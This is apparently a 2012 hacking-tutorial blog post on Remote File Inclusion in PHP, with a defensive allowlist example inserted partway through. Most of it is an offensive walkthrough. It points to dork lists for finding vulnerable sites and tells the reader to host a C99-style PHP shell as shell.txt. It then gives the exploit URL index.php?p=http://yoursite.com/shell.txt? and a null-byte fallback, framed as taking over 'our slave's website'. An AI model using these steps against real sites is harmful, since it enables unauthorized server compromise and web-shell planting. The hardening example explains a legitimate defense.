Friday 13 April 2012

RFI Part-2

Today I will be teaching you RFI (Remote File Inclusion).

What is RFI?
RFI is now an uncommon vulnerability because most websites have been patched and updated, so you will be lucky to find a vulnerable site. Nevertheless, vulnerable websites still exist; many HackForums users have dorks for finding RFI-vulnerable websites, as well as lists of such sites. RFI, also known as Remote File Inclusion, is exactly what its name says: you make the website include a file from a remote location.

What makes a page vulnerable?
A vulnerable PHP include script looks like this.

Code:
<?php
// the request parameter 'p' is passed straight to include()
include($_GET['p']);
?>

Since the code reads the 'p' parameter, the syntax would be:

Code:
http://victimsite.com/index.php?p=URL_TO_SHELL.txt?

If the script looks like this:

Code:
<?php
include($_GET['lulz']);
?>

The syntax would then be:

Code:
http://victimsite.com/index.php?lulz=URL_TO_SHELL.txt?
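To make the defensive side concrete, here is an added example (not code from the original post) that places the vulnerable include pattern above beside a hardened version. It assumes a hypothetical layout where page templates live in a ./pages/ directory and are selected by a fixed allowlist, so no user-controlled string is ever used as a path.

```php
<?php
// Added example, not from the original post. Assumed layout: templates
// live in ./pages/ as <name>.php, selected through a fixed allowlist.
declare(strict_types=1);

// Vulnerable pattern: the request parameter reaches include() unchanged.
// With allow_url_include enabled, an http:// value is fetched and executed;
// a local path or traversal sequence is included as well.
function vulnerable_include(string $p): void
{
    include($p);
}

// Hardened: map the parameter to a fixed allowlist and refuse anything else.
const ALLOWED_PAGES = [
    'home'      => 'pages/home.php',
    'interview' => 'pages/interview.php',
    'contact'   => 'pages/contact.php',
];

function resolve_page(?string $p): ?string
{
    if ($p === null) {
        return ALLOWED_PAGES['home'];
    }
    // Exact key lookup: "interview.php", "http://...", "../x" all fail.
    return ALLOWED_PAGES[$p] ?? null;
}

function safe_include(?string $p): void
{
    $file = resolve_page($p);
    if ($file === null) {
        http_response_code(404);
        echo 'Unknown page';
        return;
    }
    include __DIR__ . '/' . $file;
}

// index.php?p=interview                         -> pages/interview.php
// index.php?p=http://yoursite.com/shell.txt?    -> 404, nothing is fetched
safe_include($_GET['p'] ?? null);
```

Setting allow_url_include=Off in php.ini (the default since PHP 5.2) blocks remote URLs in include() outright, but the allowlist is still needed because it also stops local file inclusion and directory traversal through the same parameter.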

What can I accomplish with RFI?
You can include PHP shells (GNYShell, C99, etc.) into the website.
You can include just about any file onto the website.

How can I search for RFI vulnerable sites?
Using dorks, exploit scanners, etc.

Here is a list of RFI dorks:
http://paste.ubuntu.com/928080/
http://tinypaste.com/25b744e3 - pwd nullvoid, don't include "pwd"

We've got our target, how do we exploit this vulnerability?
Testing the vulnerability is basically the same as exploiting it, so we will test and finish up in one step.
First, go to the vulnerable website. For this demonstration I will use a made-up site.

Code:
http://victimsite.com/index.php?p=interview.php

As you can see above, a file is passed to index.php, in this case "interview.php". Most of the time there will be a file name at the end of the URL, just like this one: since the page is including a file, there is something for us to replace.

Tweaking and exploiting.
So now we want to tweak this to our advantage. This is rather simple.

What you will need.
You will need to upload your shell in .txt format (shell.txt) instead of .php format (shell.php).
You will need to upload it to any web hosting.
Once you have uploaded your shell to your site, the link should look like this.

Code:
http://yoursite.com/shell.txt

Including our shell to our slave's website.
Okay, once we are at the vulnerable page (http://victimsite.com/index.php?p=include.php) we want to replace "include.php" and include our own file.
Our new link should look like this.

Code:
http://victimsite.com/index.php?p=http://yoursite.com/shell.txt?

The question mark (?) is important. If the site is vulnerable, you should now see your shell embedded in the webpage, and you can then use it as you wish.

Sometimes "shell.txt?" may not be enough, and a null byte may be needed for it to execute successfully. If "shell.txt?" gives you an error, try ending the file name with a null byte instead of the question mark.

I HOPE THIS WILL HELP EVERYONE, HAPPY HACKING!!